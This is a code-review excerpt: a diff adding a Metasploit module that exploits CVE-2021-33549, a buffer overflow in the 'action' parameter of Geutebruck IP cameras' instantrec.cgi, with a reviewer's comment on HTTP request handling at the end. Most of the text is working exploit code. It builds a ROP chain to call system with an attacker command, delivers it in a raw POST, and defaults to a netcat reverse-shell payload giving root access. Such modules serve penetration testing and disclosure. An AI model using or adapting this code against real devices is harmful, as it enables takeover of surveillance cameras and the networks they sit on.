modules/exploits/linux/http/geutebruck_instantrec_bof.rb

```diff
@@ -0,0 +1,170 @@
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Geutebruck instantrec Remote Command Execution',
+        'Description' => %q{
+          This module exploits a buffer overflow within the 'action'
+           parameter of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,
+          ETHC-22xx, and EWPC-22xx devices running firmware versions == 1.12.0.27 as well as firmware 
+          versions 1.12.13.2 and 1.12.14.5.
+          Successful exploitation results in remote code execution as the root user.
+        },
+
+        'Author' => [
+       'Titouan Lazard - RandoriSec', # Discovery
+       'Ibrahim Ayadhi - RandoriSec', # Metasploit Module
+        ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['CVE', 'CVE-2021-33549'],
+            ['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
+            [ 'URL', 'http://geutebruck.com' ],
+            ['URL','https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
+          ],
+        'DisclosureDate' => '2021-07-08',
+        'Privileged' => true,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_ARMLE],
+        'Targets' => [
+          [ 'Automatic Target', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' =>
+         {
+           'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+         }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to the instantrec page', '/../uapi-cgi/instantrec.cgi']),
+      ]
+    )
+  end
+
+  def write_string(string)
+    rop = []
+    
+
+    chunks = []
+    i = 0
+    cur = 0
+    p = string.raw+' '*(4 - string.raw.length%4)
+    
+   
+    
+    for b in p.each_byte
+      if i == 4
+        chunks += [cur]
+        cur = 0
+        i = 0
+      end
+      cur += b<<i*8
+      i += 1
+    end
+    chunks += [cur]
+    
+    rop += [$pop_r4]
+    rop += [$add_str - 0x14]
+    index = 0
+    for chunk in chunks
+      rop += [$pop_r1]
+      rop += [chunk]
+      rop += [$str_r1]
+      if (index != (chunks.length - 1))
+        rop += [$add_str - 0x14 + ((index + 1) * 4)]
+      else
+        rop += [0x41414141]
+      end
+      index += 1
+    end
+    return rop
+  end
+
+  
+  
+  def exploit
+
+    print_status("#{rhost}:#{rport} - Attempting to exploit...")
+
+    connect
+    
+    ropchain = []
+    ropchain += write_string(payload)
+    ropchain += [$pop_r0]
+    ropchain += [$add_str]
+    ropchain += [$system]
+
+    
+    packed = ropchain.pack('V*')
+
+    
+    data = 'action='
+    data << $padding
+    data << packed
+    uri = "/" + Rex::Text.rand_hostname + target_uri.path
+    buf = 'POST '
+    buf << uri
+    buf << " HTTP/1.1\r\nHost: "
+    buf << rhost
+    buf << "\r\nContent-Length: "
+    buf << data.length.to_s
+    buf << "\r\n\r\n"
+    buf << data
+    
+    sock.put(buf)
```

Comment:
The payload is only sent within the POST data in the request body. Is there a reason not to use `send_request_cgi()` ? If encoding is a problem you cold opt out with `'encode_params' => false` or use `send_request_raw()` instead.